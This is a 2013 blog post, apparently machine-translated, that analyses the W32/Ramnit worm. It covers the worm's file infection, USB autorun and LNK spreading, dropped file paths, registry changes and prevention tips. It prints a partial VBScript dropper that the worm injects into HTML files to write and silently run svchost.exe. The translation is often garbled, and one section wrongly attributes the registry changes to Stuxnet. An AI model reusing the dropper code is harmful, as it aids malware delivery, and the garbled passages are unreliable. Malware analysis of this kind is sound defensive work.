Selasa, 02 Juli 2013

All About Worm W32/Ramnit Attack (Complete Version).

Esophageal W32/Ramnit 2013 Your Computer? Ramnit is a Computer worm currently affecting many Windows users. It was estimated that it infected 800 000 Windows PCs between September and December 2011. W32/Ramnit with the latest update Dr.Web antivirus detect this virus as Win32.Siggen.8 while for other files recognized as Trojan.Packed.21232, Trojan.Hotrend.34 or Trojan.Starter.1602.

Ramnit was first detected in 2010, attaching itself to most executable files and USB drives to infect additional computers. Originally a generic worm, it did not have many capabilities and was thus not considered dangerous. In 2011, malware writers altered the worm to capture data from web sessions, letting hackers commit financial fraud. Most recently, it was responsible for the theft of 45 000 login credentials, using them to infect the victims' friends and remotely access corporate networks. The current version of Ramnit is a hybrid version of the original worm, with some code taken from the ZeuS trojan horse.

Ramnit Malware malware group that is not really new, but has been actively spreading also in the year 2010. Just because the malware users like shortcut LNK security hole, sality, stuxnet, which makes this malware is not a concern of the analysis and computer users in the world.

Just like stuxnet, W32/Ramnit first variant appeared in mid-July and August 2010. While the second variant W32/Ramnit appear in October and November 2010, along with his scene-shortcut Sality attacks. And in mid-January 2011 is now emerging is the third variant of the family W32/Ramnit trying to follow the footsteps of its predecessors by using security holes LNK (shortcut) to perform and spread the infection.

Virus file W32/Ramnit.

W32/Ramnit malware created using the C programming language in compressed using UPX. Malware files have the following characteristics:
  1. Size of 105 kb
  2. File type 'Application'
  3. Using the icon "music folder"
  4. Extension "exe"

Characteristics W32/Ramnit.

One of the things that make us need to be careful of that because this malware W32/Ramnit including groups that perform infectious virus files like Sality, Virut and Alman. This could be a scourge for computer users, as it will be difficult to clean the virus infection files are done mainly executable files (application).

W32/Ramnit is one variant of the virus that does infection executable file (application). And not only the executable files, but also infection to web files (HTML) and DLL files (dynamic load library).

In addition, if you are connected to the internet, ramnit will contact a remote server (IRC server) and connect to a zombie server address to download a bunch of malware (viruses, trojans, spyware). At a certain time, W32/Ramnit using ads and popups with pornographic content and gambling (casino) and other commercials that would make you uncomfortable when they want to browse and surf. Imagine if this happens when you are a child under the age of computer you're using protection with Parental Control. For parents it's a disaster for your children exposed to pornography (because most likely pornographic content displayed will escape Parental Control in pairs) and for children it might be considered a "blessing" because the protection of pornography in pairs turned out to be tricked.

With co-exploit security holes LNK (shortcut), then the easy steps to infect users with fast computers. Although not all of these three variants W32/Ramnit using security holes LNK (shortcut), but almost all variants W32/Ramnit will be very difficult to clean.

For information, the virus will spread using removable media (USB Flash) by exploiting the autorun feature of Windows. So that the virus can be activated automatically, it will create an autorun.inf file, but that he would make a 4 (four) shortcut file with the name "Copy of Shortcut to (1). Lnk" s / d "Copy of Shortcut to (4 ). lnk ". If the user is running one of the 4 shortcut file before it will automatically execute the virus file that has been prepared in the directory [% USB Flash%: \ RECYCLER \%random name%. Exe].

This virus will also inject a file that has the extension EXE, EXE files that injected each will have a size of 107 KB larger than the original size. At the time of running the EXE file which has been injected with the virus will create a duplicate file that are stored in the same directory with the format% nama_file_asal% mgr.exe (for example: if the user runs the file is already in the injection with the name "ATF-Cleaner.exe" will emerging viral duplicate files with the name "ATF-Cleanermgr.exe" with the size of 105 kb, the duplicate files detected as Trojan.Packed.21232.

Trojan worm that includes group / backdoor, he will be active if the target computer is connected to the Internet and one of his best dangerous and dizziness computer users make is to download other viruses. Remarkably, the name and type of virus that downloaded will vary according to each target computer either from the name and size, this is what causes a lot of trouble though antivirus program to detect and cleanup. If the file is successfully downloaded, it will automatically be enabled on the computer and perform a series of malicious code that has been planted in his body.

In general, this virus is quite troublesome, it will always connect to the internet to call the specified website address that will be displayed continuously, resulting in a slow computer at the time of access, especially this virus will inject a file that has the extension EXE, DLL and HTM / HTML either program files or Windows system files that needed special cleaning steps.

Target infections.

At the time of Ramnit infects a computer it will find and infect a file that has the extension EXE, DLL and HTM / HTML in all drives, including removable media. The interesting thing here is to have the ability to insert Ramnit virus code on each file HTM / HTML are met. When the victim opens the file HTM / HTML are already infected Ramnit will automatically create a file with the name "svchost.exe" in the folder [C: \ Documents and Settings \% UsernamePC% \ Local Settings \ Temp].

After successfully creating the file "svchost.exe", ramnit will run the file so that it will form a new file with the name "svchostmgr.exe" in the same location, then it will create the file "watermark.exe" as the master file in the specified location. File "watermark.exe" for some time will be active in memory and then will piggyback to process "Svchost.exe" Windows, sehigga process performed in memory instead of the file "watermark.exe" but rather "Svchost.exe" to be active with using userPC% username% (% userPC%, is the user account that is used when logging Windows).

Characteristics and symptoms of the visible
  • Pop-up ads or pop-ups with pornographic content / gambling

Within a certain time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casinos). It sometimes makes computer users become uncomfortable. (See figure 1)

Pop-up ads that run W32/Ramnit

  • Icon Removable media (USB Flash) turned into a folder icon (see figure 2) 

A modified USB Flash Icon W32/Ramnit

  • Users can not access the USB Flash to display the message Access is denied (see figure 3)

Block access to USB Flash

  • Message appears Compressed (zipped) Folders when accessing Flash disk (see Figure 4)

An error message when access to USB Flash

  • Appears many files with filenames Copy of Shortcut to (1). Lnk s / d Copy of Shortcut to (4). Lnk in USB Flash. (See figure 5)

A virus files in drop by virus in USB Flash

One of the things that is unique and makes it very easy virus active and difficult to eradicate is that every time a user right-click, right-click menu in addition to displays, computer users indirectly also run this virus.

In addition to visible symptoms, Ramnit will perform stunts both visible and invisible, but the effects are felt and dangerous for the victim because in addition to steal data from the victim computer, he also did download other malware that are just as dangerous as Sality, Wapomi, Viking , Renosator, PWSTool, Alman, Kolab and many other harmful malware. The more details that sometimes action Ramnit invisible but dangerous can be seen from the link below.

Media Spread

To spread itself, it will use a USB Flash by utilizing the Windows autorun feature to create multiple files following:
  • Windows security exploits MS10-046 KB2286198
  • Internet, the spread of Ramnit over the Internet can occur if the user access htm or html file from a webserver already in injection by Ramnit.
  • Network (LAN / WAN) by injecting EXE file / DLL / HTM / HTML on the folder / drive on the share.
  • autorun.inf
Autorun.inf file itself contains a script that will run automatically when the user access the USB Flash, this script contains the command to run the file in the directory [RECYCLER \% XX%] 

Autorun.inf script
  • 4 (four) pieces of shortcut files (Copy of Shortcut to (1). Lnk sd copy of Shortcut to (4). Lnk)
  1. % xx%. exe with a size of 105 KB
  2. % xx%. cpl with a size of 4 KB

 Note:% xx% is the folder / file with a random name (see Figure 16)

A file created by the virus

If the user is running one of the shortcut file it will automatically execute the virus file was in the directory [RECYCLER \% XX%]

Ramnit action that harmless
  • Appearing error or script error pop-up after pop-up ads that appear.
Once the pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script-like viruses "ARP Spoofing" in 2008. (See figure 6)

Pop-up error or script error

  • Injection file. Exe,. Etc.

Just like Sality malware variants, Alman and Virut, W32/Ramnit to inject exe file. However, W32/Ramnit also perform the injection DLL files (dynamic load library). Exe and dll files are injected will increase approximately between 100-120 kb, depending on the variant of the Ramnit infects. Even so, not all files. Exe and. Etc on drive C: which is injected.

  • HTM file injection / HTML

Besides inject file. Exe and. Etc., W32/Ramnit also do injection for HTM and HTML files. Injection is done by adding the header and footer. (See figure 7).
In the header, add W32/Ramnit script:
DropFileName = "svchost.exe"

The script is added to the HTML file header

  • While in the footer, W32/Ramnit add script: (see figure 8)

Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder (2) & "\" DropFileName
If FSO.FileExists (DropPath) = False Then
Set fileobj = FSO.CreateTextFile (DropPath, True)
For i = 1 To Len (WriteData) Step2
Fileobj.write chr (CLng ("& H" & Mid (WriteData, i, 2)))
End If
Set WshShell = CreateObject ("WScript.Shell")
WSHshell.Run DropPath, 0

Which added to the footer Script HTML file

  • Creating Windows services function to be blank

With action to inject file on the file "iexplore.exe" and file "services.exe", as well as add a script to a web file (htm / html) to make the function of the Windows services to be blank. (See figure 9)

A blank Windows Services Function

  • Make the computer hangs / slow network connections and even become disconnected. Some of the symptoms that occur and their causes can be explained as follows based on the type of file that Ramnit injection:
  1. C: \ WINDOWS \ system32 \ svchost.exe, svchost.ece file system is associated with a network connection. As a result, the computer network will be disconnected when the file is in the injection.
  2. C: \ WINDOWS \ system32 \ lsass.exe, lsass.exe is a system file related to computer activity. As a result of this injection, the computer system will be slow / hang.
  3. C: \ WINDOWS \ system32 \ services.exe, services.exe is associated with the file system services and drivers running. As a result of this injection will cause disruption to services and drivers in the injection.
  4. C: \ Program Files \ Internet Explorer \ iexplore.exe, iexplore.exe is a file browser Internet Explorer from Microsoft. The purpose of this injection is to be controlled so that the browser can connect to a remote server that has been determined by the previous Ramnit.
  • Active in memory processes

As stated above, after successfully mastering Internet Explorer, W32/Ramnit try to connect to Remote Server using Internet Explorer which has been in the injection. This can be seen in the task manager, even though we are not open IE / Internet Explorer (see figure 10)

Process IEXPLORE.EXE (Internet Explorer) that has been in-injection by W32/Ramnit

  • Connect to Remote Server

W32/Ramnit malware connect to Remote Server to perform the necessary delivery information on the Remote Server. Remote Server used is between it:

  • To transfer data to a Remote Server

In addition to trying to connect and to communicate with a remote server, W32/Ramnit also try to transfer data from the victim's computer to the Remote Server and instead send malware files to the victim's computer. (See figure 11)

The data transfer between the victim's computer with Remote Server

  • To broadcast

Just like the Conficker worm her, W32/Ramnit also broadacast on the network. That was different was to W32/Ramnit only perform at one address ie: ADX.ADNXS.COM (see figure 12)

Which is carried out by the Broadcast W32/Ramnit

  • W32/Ramnit when executed, it will inject some Windows system files are:

  1. C: \ WINDOWS \ system32 \ lsass.exe
  2. C: \ WINDOWS \ system32 \ svchost.exe
  3. C: \ WINDOWS \ system32 \ services.exe
  4. C: \ Program Files \ Internet Explorer \ IEXPLORE.EXE

  • If connected to the internet, W32/Ramnit will download some malware files and folders as follows:

  1. C: \ Documents and Settings \% username% \ Local Settings \ Temp \ [number]. Tmp
  2. C: \ Documents and Settings \% username% \ Local Settings \ Temp \ explorer.dat
  3. C: \ Documents and Settings \% username% \ Local Settings \ Temp \ winlogon.dat
  4. C: \ Documents and Settings \% username% \ Local Settings \ Temp \ [Random_name]. Exe
  5. C: \ Documents and Settings \% username% \ Start Menu \ Programs \ [Random_name]. Exe
  6. C: \ Program Files \ Intenet Explorer \ complete.dat
  7. C: \ Program Files \ Intenet Explorer \ dmlconf.dat
  8. C: \ Program Files \ win \ [Random_number]. Exe
  9. C: \ Program Files \ qwe
  10. C: \ WINDOWS \ [Random_name]. Exe
  11. C: \ WINDOWS \ System32 \ [Random_name]. Etc.
  12. C: \ WINDOWS \ System32 \ [name & number_Random]. Etc.
  13. C: \ WINDOWS \ Temp \ [number]. Tmp

  • In addition, the injection of some W32/Ramnit doing the following files (if any), namely:

  1. C: \ contacts.html
  2. C: \ inetpub \ wwwroot \ index.html
  3. C: \ Program Files \ Common Files \ designer \ MSADDNDR.DLL
  4. C: \ Program Files \ Common Files \ designer \ MSHTMPGD.DLL
  5. C: \ Program Files \ Common Files \ designer \ MSHTMPGR.DLL
  6. C: \ Program Files \ Common Files \ System \ ado \ MDACReadme.htm
  7. C: \ Program Files \ Common Files \ System \ Ole DB \ MSDAIPP.DLL
  8. C: \ Program Files \ MSN \ MSNCoreFiles \ OOBE \ obelog.dll
  9. C: \ Program Files \ MSN \ MSNCoreFiles \ OOBE \ obemetal.dll
  10. C: \ Program Files \ MSN \ MSNCoreFiles \ OOBE \ obepopc.dll
  11. C: \ Program Files \ MSN \ MSNIA \ custdial.dll
  12. C: \ Program Files \ MSN \ MSNIA \ msniasvc.exe
  13. C: \ Program Files \ MSN \ MSNIA \ prestp.exe
  14. C: \ Program Files \ MSN \ MsnInstaller \ iasvcstb.dll
  15. C: \ Program Files \ MSN \ MsnInstaller \ msdbxi.dll
  16. C: \ Program Files \ MSN \ MsnInstaller \ msninst.dll
  17. C: \ Program Files \ MSN \ MsnInstaller \ msninst.exe
  18. C: \ Program Files \ MSN \ MsnInstaller \ msnsign.dll
  19. C: \ Program Files \ NetMeeting \ netmeet.htm

  • In addition to the removable disk / drive will create some files:

  1. autorun.inf
  2. Copy of Shortcut to (1). Lnk
  3. Copy of Shortcut to (2). Lnk
  4. Copy of Shortcut to (3). Lnk
  5. Copy of Shortcut to (4). Lnk
  6. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name1]. Exe
  7. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name2]. Exe
  8. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name3]. Exe
  9. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name4]. Exe
  10. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name5]. Exe
  11. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name6]. Exe
  12. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name7]. Exe
  13. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name8]. Exe
  14. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name9]. Exe
  15. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name10]. Exe
  16. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name11]. Exe
  17. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name1]. Cpl
  18. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name2]. Cpl
  19. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name3]. Cpl
  20. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name4]. Cpl
  21. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name5]. Cpl
  22. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name6]. Cpl
  23. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name7]. Cpl
  24. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name8]. Cpl
  25. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name9]. Cpl
  26. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name10]. Cpl
  27. RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [Random_name11]. Cpl
  28. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name1]. Exe
  29. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name2]. Exe
  30. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name3]. Exe
  31. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name4]. Exe
  32. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name5]. Exe
  33. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name6]. Exe
  34. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name7]. Exe
  35. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name1]. Cpl
  36. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name2]. Cpl
  37. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name3]. Cpl
  38. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name4]. Cpl
  39. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name5]. Cpl
  40. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name6]. Cpl
  41. RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [Random_name7]. Cpl

  • As well as on the use of mapping network drives, trying to inject some files that have the following names:

  1. Blank.htm
  2. Citrus Punch.htm
  3. Clear Day.htm
  4. Fiesta.htm
  5. Ivy.htm
  6. Leaves.htm
  7. Maize.htm
  8. Nature.htm
  9. Network Blitz.htm
  10. Pie Charts.htm
  11. Sunflower.htm
  12. Sweets.htm
  13. Technical.htm

Registry modifications

Some registry modifications made by the Stuxnet worm are as follows:

Adding Registry

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run
[Nama_acak] = C: \ Documents and Settings \% username% \ Local Settings \ Temp \ [nama_acak]. Exe
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Enum \ Root \ LEGACY_60DFFE60
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Enum \ Root \ LEGACY_60DFFE60 \ 0000
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Enum \ Root \ LEGACY_60DFFE60 \ 0000 \ Control
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Enum \ Root \ LEGACY_60DFFE60
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Enum \ Root \ LEGACY_60DFFE60 \ 0000
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Enum \ Root \ LEGACY_60DFFE60 \ 0000 \ Control
HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Internet Explorer \ Main \ FeatureControl
HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Internet Explorer \ Main \ FeatureControl \ FEATURE_BROWSER_EMULATION
HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Internet Explorer \ international

Removing Registry

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ SystemRes tore]
DisableSR = 0x00000001

Changing the Registry

[HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ Zones \ 3]
CurrentLevel =
1601 =

Deployment methods
Some ways W32/Ramnit make the distribution is as follows:

  • Drive by download (exploit)

W32/Ramnit initially spread by exploiting features of the drive by download on the Windows system. With links are scattered on the forum or e-mail, trying to trick the user to run the link. In addition, while access to websites that provide content or browser plugin for download.

  • Removable drive / disk

This method is commonly done by computer users. W32/Ramnit make a lot of files in order to infect computers, and were also exploit security holes LNK (shortcut). (See figure 10)

W32/Ramnit infect removable disk / drive

  • Network

W32/Ramnit trying to do the injection on some web files (htm) on a particular computer on the network that do drive mapping. The following files are:

  1. Blank.htm
  2. Citrus Punch.htm
  3. Clear Day.htm
  4. Fiesta.htm
  5. Ivy.htm
  6. Leaves.htm
  7. Maize.htm
  8. Nature.htm
  9. Network Blitz.htm
  10. Pie Charts.htm
  11. Sunflower.htm
  12. Sweets.htm
  13. Technical.htm

Prevention tips from Malware W32/Ramnit.

  1. Enable Windows Firewall or other firewall software use. This is to prevent access to undesirable
  2. Make sure the computer is getting the latest updates from the Windows system. To facilitate use of the automatic update system like "Automatic Updates". Or you can also download the latest patches from Microsoft's website.
  3. Use antivirus always updated properly. This is to facilitate the variants of the new malware.
  4. Restrict access to administrator access. For Windows 7 and Vista users, make sure the UAC (user account control) has run well.
  5. Be careful when opening e-mail attachment or when receiving a file transfer from an unknown person. Always check the scan with updated antivirus.
  6. Be wary of programs crack / keygen or programs that are not known. Because it could have been infected or contain malware.
  7. Use a password that is not easy to read and know. Make sure the fox is always on time-specific password, and the password distinguish one another.
  8. Turn off the "autoplay" Windows to prevent unwanted programs on removable drive / disk runs automatically
  9. Turn off file sharing if not used. If it uses only the status of file sharing read-only, or just sharing configuration for specific users.
  10. Be careful when accessing a website or forum that provides certain links to be downloaded or installed

Author : Yohanes Gitoyo.
Source : 

Tidak ada komentar:

Posting Komentar